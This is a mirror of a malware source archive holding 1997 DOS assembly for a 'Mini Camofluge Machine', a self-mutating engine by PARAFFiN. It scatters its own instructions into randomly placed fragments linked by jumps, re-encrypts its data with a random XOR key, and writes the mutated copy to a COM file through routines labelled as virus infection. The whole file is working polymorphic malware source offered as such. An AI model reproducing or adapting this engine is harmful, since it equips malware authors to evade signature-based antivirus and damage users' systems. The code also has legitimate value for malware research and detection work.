mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
384 lines
18 KiB
NASM
384 lines
18 KiB
NASM
|
.model tiny
|
|||
|
codeseg
|
|||
|
.8086
|
|||
|
org 100h
|
|||
|
; Mini Camofluge Machine v 0.62
|
|||
|
; (c) 1997 by Pashkovsky Maxim [PARAFFiN]
|
|||
|
;-----------------------------C-O-D-E----------------------------------------
|
|||
|
LengthVirus equ (EndVir-Start)*2
|
|||
|
;***********************I*N*T*S**********************************************
|
|||
|
start:
|
|||
|
i00: call CryptData
|
|||
|
i01: call InitRandom
|
|||
|
i02: call Infect
|
|||
|
i03: mov ax,4C00h
|
|||
|
i04: int 21h
|
|||
|
;============================================================================
|
|||
|
InitRandom proc near
|
|||
|
i05: push es
|
|||
|
i06: mov ax,0040h
|
|||
|
i07: mov es,ax
|
|||
|
i08: mov ax,es:[006ch]
|
|||
|
i09: mov word ptr cs:[rseed],ax
|
|||
|
i10: pop es
|
|||
|
i11: ret
|
|||
|
InitRandom endp
|
|||
|
;============================================================================
|
|||
|
Random proc near ; 16 bit Random number
|
|||
|
i12: push cx
|
|||
|
i13: push bx
|
|||
|
i14: mov bx,word ptr cs:[rvalue]
|
|||
|
i15: mov ax,word ptr cs:[rseed]
|
|||
|
i16: rol ax,1
|
|||
|
i17: sub ax,7
|
|||
|
i18: xor ax,bx
|
|||
|
i19: mov word ptr cs:[rvalue],ax
|
|||
|
i20: mov word ptr cs:[rseed],bx
|
|||
|
i21: mul dx ;(input value) * (delta)
|
|||
|
i22: mov cx,-1
|
|||
|
i23: cmp dx,cx ;verify divide will work
|
|||
|
i24: jae @abort ;jmp if divide will not work
|
|||
|
i25: div cx ;(input value) * (delta) / ffffh
|
|||
|
i26: @abort: pop bx
|
|||
|
i27: pop cx
|
|||
|
i28: ret
|
|||
|
Random endp
|
|||
|
;============================================================================
|
|||
|
VerifyAlloc proc near ; Verify place.
|
|||
|
i29: push ax
|
|||
|
i30: push cx
|
|||
|
i31: mov ax,word ptr cs:[AddrPTR]
|
|||
|
i32: mov bx,offset AddrTab
|
|||
|
i33: sub ax,bx
|
|||
|
i34: push dx ;<=<3D>
|
|||
|
i35: mov cx,2AABh ; | divide ax by 6 = ax/6
|
|||
|
i36: mul cx ; :
|
|||
|
i37: mov cx,dx ; |
|
|||
|
i38: pop dx ;<=<3D>
|
|||
|
i39: @vloop: mov ax,word ptr cs:[bx]
|
|||
|
i40: cmp dx,ax
|
|||
|
i41: jb @vnext
|
|||
|
i42: add ax,word ptr cs:[bx+2]
|
|||
|
i43: cmp dx,ax
|
|||
|
i44: jb @verror
|
|||
|
i45: @vnext: add bx,6
|
|||
|
i46: loop @vloop
|
|||
|
i47: clc
|
|||
|
i48: jmp @vquit
|
|||
|
i49: @verror: stc
|
|||
|
i50: @vquit: pop cx
|
|||
|
i51: pop ax
|
|||
|
i52: ret
|
|||
|
VerifyAlloc endp
|
|||
|
;============================================================================
|
|||
|
Jump proc near ; Make near jump (E9h opcode) to free random place.
|
|||
|
i53: push ax
|
|||
|
i54: mov bx,word ptr cs:[AddrPTR]
|
|||
|
i55: mov word ptr cs:[bx],di
|
|||
|
i56: mov word ptr cs:[bx+2],3
|
|||
|
i57: mov word ptr cs:[bx+4],0
|
|||
|
i58: add word ptr cs:[AddrPTR],6
|
|||
|
i59: mov al,0E9h
|
|||
|
i60: stosb
|
|||
|
i61: @jnew: mov dx,0FFFDh
|
|||
|
i62: call Random
|
|||
|
i63: mov dx,di
|
|||
|
i64: add dx,2
|
|||
|
i65: add dx,ax
|
|||
|
i66: cmp dx,offset code + LengthVirus - 10
|
|||
|
i67: jae @jnew
|
|||
|
i68: cmp dx,offset code
|
|||
|
i69: jbe @jnew
|
|||
|
i70: xor cx,cx
|
|||
|
i71: mov bx,word ptr cs:[LenghtPTR]
|
|||
|
i72: mov cl,byte ptr cs:[bx]
|
|||
|
i73: add cx,3
|
|||
|
i74: @jverify: call VerifyAlloc ; Verify place.
|
|||
|
i75: jc @jnew
|
|||
|
i76: inc dx
|
|||
|
i77: loop @jverify
|
|||
|
i78: @jend: stosw
|
|||
|
i79: add di,ax
|
|||
|
i80: pop ax
|
|||
|
i81: ret
|
|||
|
Jump endp
|
|||
|
;============================================================================
|
|||
|
JumpNear proc near ;Proc for adjust near jump.
|
|||
|
i82: push ax
|
|||
|
i83: mov bx,word ptr cs:[AddrPTR]
|
|||
|
i84: mov word ptr cs:[bx],di ; Build table for near jumps.
|
|||
|
i85: mov word ptr cs:[bx+2],2
|
|||
|
i86: mov word ptr cs:[bx+4],si
|
|||
|
i87: add word ptr cs:[AddrPTR],6
|
|||
|
i88: movsb
|
|||
|
i89: @jnnew: xor ax,ax
|
|||
|
i90: mov dx,0FDh
|
|||
|
i91: call Random
|
|||
|
i92: cmp al,20
|
|||
|
i93: jb @jnnew
|
|||
|
i94: cbw
|
|||
|
i95: mov dx,di
|
|||
|
i96: inc dx
|
|||
|
i97: add dx,ax
|
|||
|
i98: cmp dx,offset code + LengthVirus - 10
|
|||
|
i99: jae @jnnew
|
|||
|
i100: cmp dx,offset code
|
|||
|
i101: jbe @jnnew
|
|||
|
i102: mov cx,3
|
|||
|
i103: @jnverify: call VerifyAlloc ; Verify place.
|
|||
|
i104: jc @jnnew
|
|||
|
i105: inc dx
|
|||
|
i106: loop @jnverify
|
|||
|
i107: stosb
|
|||
|
i108: push di
|
|||
|
i109: add di,ax
|
|||
|
i110: mov bx,word ptr cs:[AddrPTR]
|
|||
|
i111: mov word ptr cs:[bx],di
|
|||
|
i112: mov word ptr cs:[bx+2],3
|
|||
|
i113: mov word ptr cs:[bx+4],0
|
|||
|
i114: add word ptr cs:[AddrPTR],6
|
|||
|
i115: mov al,0E9h
|
|||
|
i116: stosb
|
|||
|
i117: lodsb
|
|||
|
i118: cbw
|
|||
|
i119: push si
|
|||
|
i120: add si,ax
|
|||
|
i121: lodsb
|
|||
|
i122: cmp al,0E9h
|
|||
|
i123: jne @jnnext
|
|||
|
i124: lodsw
|
|||
|
i125: add si,ax
|
|||
|
i126: inc si
|
|||
|
i127: @jnnext: dec si
|
|||
|
i128: mov bx,word ptr cs:[JumpPTR] ;Near jump table.
|
|||
|
i129: mov word ptr cs:[bx],si
|
|||
|
i130: mov word ptr cs:[bx+2],di
|
|||
|
i131: add word ptr cs:[JumpPTR],4
|
|||
|
i132: pop si
|
|||
|
i133: pop di
|
|||
|
i134: pop ax
|
|||
|
i135: ret
|
|||
|
JumpNear endp
|
|||
|
;============================================================================
|
|||
|
CallNear proc near ;Build addr table for near call.
|
|||
|
i136: mov bx,word ptr cs:[JumpPTR]
|
|||
|
i137: mov cx,si
|
|||
|
i138: add cx,3 ;inc cx
|
|||
|
i139: add cx,word ptr cs:[si+1]
|
|||
|
i140: mov word ptr cs:[bx],cx
|
|||
|
i141: mov word ptr cs:[bx+2],di
|
|||
|
i142: inc word ptr cs:[bx+2]
|
|||
|
i143: add word ptr cs:[JumpPTR],4
|
|||
|
i144: ret
|
|||
|
CallNear endp
|
|||
|
;============================================================================
|
|||
|
MoveInst proc near ;Move instruction on new place.
|
|||
|
i145: cmp si,word ptr cs:[CryptMov] ; Verify CryptValue
|
|||
|
i146: jne @NoValue
|
|||
|
i147: mov word ptr cs:[OldCryptMov],si
|
|||
|
i148: mov word ptr cs:[CryptMov],di
|
|||
|
i149: jmp @NoCrypt
|
|||
|
i150: @NoValue: cmp si,word ptr cs:[CryptChg] ; Verify ChangeCrypt
|
|||
|
i151: jne @NoCrypt
|
|||
|
i152: mov word ptr cs:[OldCryptChg],si
|
|||
|
i153: mov word ptr cs:[CryptChg],di
|
|||
|
i154: @NoCrypt: mov bx,word ptr cs:[LenghtPTR] ;====================
|
|||
|
i155: xor cx,cx
|
|||
|
i156: mov cl,byte ptr cs:[bx]
|
|||
|
i157: mov bx,word ptr cs:[AddrPTR]
|
|||
|
i158: mov word ptr cs:[bx],di ;Build table for instr.
|
|||
|
i159: mov word ptr cs:[bx+2],cx
|
|||
|
i160: mov word ptr cs:[bx+4],si
|
|||
|
i161: add word ptr cs:[AddrPTR],6
|
|||
|
i162: rep movsb
|
|||
|
i163: ret
|
|||
|
MoveInst endp
|
|||
|
;============================================================================
|
|||
|
Mutation proc near ;Main loop of mutation.
|
|||
|
i164: mov si,offset start ; SI have OLD! code offset.
|
|||
|
i165: mov di,offset code ; DI have NEW! code offset.
|
|||
|
i166: mov ax,offset EndData-offset LenghtTab-1
|
|||
|
i167: cld
|
|||
|
i168: @m1: cmp byte ptr cs:[si],70h ;<=<3D>
|
|||
|
i169: jb @m2 ; | jumps.
|
|||
|
i170: cmp byte ptr cs:[si],7Fh ;<=<3D>
|
|||
|
i171: jbe @realloc
|
|||
|
i172: @m2: cmp byte ptr cs:[si],0E0h
|
|||
|
i173: jb @m3
|
|||
|
i174: cmp byte ptr cs:[si],0E3h
|
|||
|
i175: jbe @realloc
|
|||
|
i176: @m3: cmp byte ptr cs:[si],0EBh ; short jump.
|
|||
|
i177: je @realloc
|
|||
|
i178: cmp byte ptr cs:[si],0E8h ; near call.
|
|||
|
i179: jne @m4
|
|||
|
i180: call CallNear
|
|||
|
i181: @m4: cmp byte ptr cs:[si],0E9h ; NEAR JUMP !!!
|
|||
|
i182: jne @mend
|
|||
|
i183: mov bx,word ptr cs:[si+1]
|
|||
|
i184: add si,3
|
|||
|
i185: add si,bx
|
|||
|
i186: jmp @m1
|
|||
|
i187: @realloc: call JumpNear
|
|||
|
i188: jmp @mnext
|
|||
|
i189: @mend: call MoveInst
|
|||
|
i190: @mnext: inc word ptr cs:[LenghtPTR]
|
|||
|
i191: mov dx,di
|
|||
|
i192: mov cx,3
|
|||
|
i193: mov bx,word ptr cs:[LenghtPTR]
|
|||
|
i194: add cl,byte ptr cs:[bx]
|
|||
|
i195: @mjverify: call VerifyAlloc ; Verify place.
|
|||
|
i196: jc @mjump
|
|||
|
i197: inc dx
|
|||
|
i198: loop @mjverify
|
|||
|
i199: cmp dx,offset code + LengthVirus - 10
|
|||
|
i200: jae @mjump
|
|||
|
i201: push ax
|
|||
|
i202: mov dx,3h
|
|||
|
i203: call Random
|
|||
|
i204: cmp al,1h
|
|||
|
i205: pop ax
|
|||
|
i206: jne @loop
|
|||
|
i207: @mjump: call Jump
|
|||
|
i208: @loop: dec ax
|
|||
|
i209: jnz @m1 ;============================================
|
|||
|
i210: mov dx,word ptr cs:[JumpPTR] ; Adjust address.
|
|||
|
i211: mov bx,offset JumpTab
|
|||
|
i212: sub dx,bx
|
|||
|
i213: shr dx,1 ; div 4
|
|||
|
i214: shr dx,1 ; <=<3D>
|
|||
|
i215: @mreall: mov di,offset AddrTab
|
|||
|
i216: mov ax,word ptr cs:[bx]
|
|||
|
i217: mov cx,word ptr cs:[AddrPTR]
|
|||
|
i218: sub cx,di
|
|||
|
i219: shr cx,1
|
|||
|
i220: repnz scasw
|
|||
|
i221: jcxz @merror
|
|||
|
i222: mov ax,word ptr cs:[di-6]
|
|||
|
i223: mov di,word ptr cs:[bx+2]
|
|||
|
i224: sub ax,di
|
|||
|
i225: sub ax,2
|
|||
|
i226: stosw
|
|||
|
i227: @merror: add bx,4
|
|||
|
i228: dec dx
|
|||
|
i229: jnz @mreall ;========================================
|
|||
|
i230: mov word ptr cs:[LenghtPTR],offset LenghtTab
|
|||
|
i231: mov word ptr cs:[AddrPTR],offset AddrTab
|
|||
|
i232: mov word ptr cs:[JumpPTR],offset JumpTab
|
|||
|
i233: mov dx,0FFFFh ; Adjust CryptValue.
|
|||
|
i234: call Random
|
|||
|
i235: mov bx,word ptr cs:[CryptMov]
|
|||
|
i236: mov [bx+1],ax
|
|||
|
i237: sub word ptr cs:[CryptMov],offset Code-100h
|
|||
|
i238: mov bx,word ptr cs:[OldCryptMov]
|
|||
|
i239: mov [bx+1],ax ;<===========================
|
|||
|
i240: mov dx,0FFFFh ; Adjust ChangeValue.
|
|||
|
i241: call Random
|
|||
|
i242: mov bx,word ptr cs:[CryptChg]
|
|||
|
i243: mov [bx+2],ax
|
|||
|
i244: sub word ptr cs:[CryptChg],offset Code-100h
|
|||
|
i245: mov bx,word ptr cs:[OldCryptChg]
|
|||
|
i246: mov [bx+2],ax ;<===========================
|
|||
|
i247: call CryptData ; Crypt.
|
|||
|
i248: mov si,offset Data ; Move data.
|
|||
|
i249: mov di,offset AddrTab ; NewData;
|
|||
|
i250: mov cx,EndData-Data
|
|||
|
i251: rep movsb
|
|||
|
i252: ret
|
|||
|
Mutation endp
|
|||
|
;============================================================================
|
|||
|
Infect proc near
|
|||
|
i253: call Message
|
|||
|
i254: mov dx,offset FileName ;Open File
|
|||
|
i255: mov ah,3ch
|
|||
|
i256: xor cx,cx
|
|||
|
i257: int 21h
|
|||
|
i258: mov word ptr cs:[FileHandle],ax
|
|||
|
i259: call Mutation
|
|||
|
i260: mov bx,word ptr cs:[FileHandle] ;Write Virus body
|
|||
|
i261: mov cx,offset EndData - 100h ;offset JumpTab + 512 - 100h
|
|||
|
i262: mov dx,offset Code
|
|||
|
i263: mov ah,40h
|
|||
|
i264: int 21h
|
|||
|
i265: mov bx,word ptr cs:[FileHandle] ;Close file
|
|||
|
i266: mov ah,3Eh
|
|||
|
i267: int 21h
|
|||
|
i268: ret
|
|||
|
Infect endp
|
|||
|
;============================================================================
|
|||
|
Message proc near
|
|||
|
i269: mov dx,offset Copyright
|
|||
|
i270: mov ah,09h
|
|||
|
i271: int 21h
|
|||
|
i272: ret
|
|||
|
Message endp
|
|||
|
;============================================================================
|
|||
|
CryptData proc near ; Crypt data body.
|
|||
|
i273: mov cx,(EndData-Data)/2+1
|
|||
|
i274: mov si,offset Data
|
|||
|
i275: push si
|
|||
|
i276: pop di
|
|||
|
i277: CryptValue db 0BAh,?,? ;mov dx,??h
|
|||
|
i278: @DeCrypt: lodsw
|
|||
|
i279: xor ax,dx
|
|||
|
i280: stosw
|
|||
|
i281: ChangeValue db 81h,0C2h,?,? ;add dx,??h
|
|||
|
i282: loop @DeCrypt
|
|||
|
i283: ret
|
|||
|
i284:
|
|||
|
CryptData endp
|
|||
|
;============================================================================
|
|||
|
EndVir:
|
|||
|
org LengthVirus+100h ;$+300h
|
|||
|
;---------------------------------D-A-T-A------------------------------------
|
|||
|
Data:
|
|||
|
Copyright db '[MCMv0.62(c)Jul1997byPARAFFiN]','$'
|
|||
|
FileName db 'test_mcm.com',0
|
|||
|
LenghtPTR dw offset LenghtTab
|
|||
|
AddrPTR dw offset AddrTab
|
|||
|
JumpPTR dw offset JumpTab
|
|||
|
CryptMov dw offset CryptValue
|
|||
|
CryptChg dw offset ChangeValue
|
|||
|
LenghtTab: ; Instruction lenght table.
|
|||
|
db i01-i00,i02-i01,i03-i02,i04-i03,i05-i04,i06-i05,i07-i06,i08-i07,i09-i08,i10-i09
|
|||
|
db i11-i10,i12-i11,i13-i12,i14-i13,i15-i14,i16-i15,i17-i16,i18-i17,i19-i18,i20-i19
|
|||
|
db i21-i20,i22-i21,i23-i22,i24-i23,i25-i24,i26-i25,i27-i26,i28-i27,i29-i28,i30-i29
|
|||
|
db i31-i30,i32-i31,i33-i32,i34-i33,i35-i34,i36-i35,i37-i36,i38-i37,i39-i38,i40-i39
|
|||
|
db i41-i40,i42-i41,i43-i42,i44-i43,i45-i44,i46-i45,i47-i46,i48-i47,i49-i48,i50-i49
|
|||
|
db i51-i50,i52-i51,i53-i52,i54-i53,i55-i54,i56-i55,i57-i56,i58-i57,i59-i58,i60-i59
|
|||
|
db i61-i60,i62-i61,i63-i62,i64-i63,i65-i64,i66-i65,i67-i66,i68-i67,i69-i68,i70-i69
|
|||
|
db i71-i70,i72-i71,i73-i72,i74-i73,i75-i74,i76-i75,i77-i76,i78-i77,i79-i78,i80-i79
|
|||
|
db i81-i80,i82-i81,i83-i82,i84-i83,i85-i84,i86-i85,i87-i86,i88-i87,i89-i88,i90-i89
|
|||
|
db i91-i90,i92-i91,i93-i92,i94-i93,i95-i94,i96-i95,i97-i96,i98-i97,i99-i98,i100-i99
|
|||
|
db i101-i100,i102-i101,i103-i102,i104-i103,i105-i104,i106-i105,i107-i106,i108-i107,i109-i108,i110-i109
|
|||
|
db i111-i110,i112-i111,i113-i112,i114-i113,i115-i114,i116-i115,i117-i116,i118-i117,i119-i118,i120-i119
|
|||
|
db i121-i120,i122-i121,i123-i122,i124-i123,i125-i124,i126-i125,i127-i126,i128-i127,i129-i128,i130-i129
|
|||
|
db i131-i130,i132-i131,i133-i132,i134-i133,i135-i134,i136-i135,i137-i136,i138-i137,i139-i138,i140-i139
|
|||
|
db i141-i140,i142-i141,i143-i142,i144-i143,i145-i144,i146-i145,i147-i146,i148-i147,i149-i148,i150-i149
|
|||
|
db i151-i150,i152-i151,i153-i152,i154-i153,i155-i154,i156-i155,i157-i156,i158-i157,i159-i158,i160-i159
|
|||
|
db i161-i160,i162-i161,i163-i162,i164-i163,i165-i164,i166-i165,i167-i166,i168-i167,i169-i168,i170-i169
|
|||
|
db i171-i170,i172-i171,i173-i172,i174-i173,i175-i174,i176-i175,i177-i176,i178-i177,i179-i178,i180-i179
|
|||
|
db i181-i180,i182-i181,i183-i182,i184-i183,i185-i184,i186-i185,i187-i186,i188-i187,i189-i188,i190-i189
|
|||
|
db i191-i190,i192-i191,i193-i192,i194-i193,i195-i194,i196-i195,i197-i196,i198-i197,i199-i198,i200-i199
|
|||
|
db i201-i200,i202-i201,i203-i202,i204-i203,i205-i204,i206-i205,i207-i206,i208-i207,i209-i208,i210-i209
|
|||
|
db i211-i210,i212-i211,i213-i212,i214-i213,i215-i214,i216-i215,i217-i216,i218-i217,i219-i218,i220-i219
|
|||
|
db i221-i220,i222-i221,i223-i222,i224-i223,i225-i224,i226-i225,i227-i226,i228-i227,i229-i228,i230-i229
|
|||
|
db i231-i230,i232-i231,i233-i232,i234-i233,i235-i234,i236-i235,i237-i236,i238-i237,i239-i238,i240-i239
|
|||
|
db i241-i240,i242-i241,i243-i242,i244-i243,i245-i244,i246-i245,i247-i246,i248-i247,i249-i248,i250-i249
|
|||
|
db i251-i250,i252-i251,i253-i252,i254-i253,i255-i254,i256-i255,i257-i256,i258-i257,i259-i258,i260-i259
|
|||
|
db i261-i260,i262-i261,i263-i262,i264-i263,i265-i264,i266-i265,i267-i266,i268-i267,i269-i268,i270-i269
|
|||
|
db i271-i270,i272-i271,i273-i272,i274-i273,i275-i274,i276-i275,i277-i276,i278-i277,i279-i278,i280-i279
|
|||
|
db i281-i280,i282-i281,i283-i282,i284-i283,0;i285-i284,i286-i285,i287-i286,i288-i287,i289-i288,i290-i289
|
|||
|
;db i291-i290,i292-i291,i293-i292,i294-i293,i295-i294,i296-i295,i297-i296,i298-i297,i299-i298,i300-i299
|
|||
|
;db i301-i300,i302-i301,i303-i302,i304-i303,i305-i304,i306-i305,i307-i306,i308-i307,i309-i308,i310-i309
|
|||
|
EndData:
|
|||
|
; Official data.
|
|||
|
RSeed dw ?
|
|||
|
RValue dw ?
|
|||
|
FileHandle dw ?
|
|||
|
OldCryptMov dw ?
|
|||
|
OldCryptChg dw ?
|
|||
|
Code db LengthVirus dup(?)
|
|||
|
AddrTab db 0B00h dup(?)
|
|||
|
JumpTab db 300h dup(?)
|
|||
|
end start
|